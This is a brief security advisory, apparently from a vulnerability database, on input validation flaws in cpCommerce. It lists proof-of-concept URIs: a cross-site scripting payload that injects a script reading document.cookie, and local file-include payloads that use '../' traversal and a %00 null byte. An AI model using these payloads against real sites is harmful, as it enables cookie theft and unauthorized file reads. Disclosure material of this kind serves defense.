|
cpCommerce Multiple Input Validation Vulnerabilities
Attackers can use a browser to exploit this issue. The following proof-of-concept URIs are available: For the cross-site scripting issue: http://www.example.com/cpcommerce/calendar.php?obj=view.year&month=2&date=21&year=2008<script>alert(document.cookie)</script> For the local file-include issues: http://www.example.com/cpcommerce/?action=language&language=../To%20DO%20LIST.txt http://www.example.com/cpcommerce/category.php?action=../To%20DO%20LIST.txt%00 |
|
|
Privacy Statement |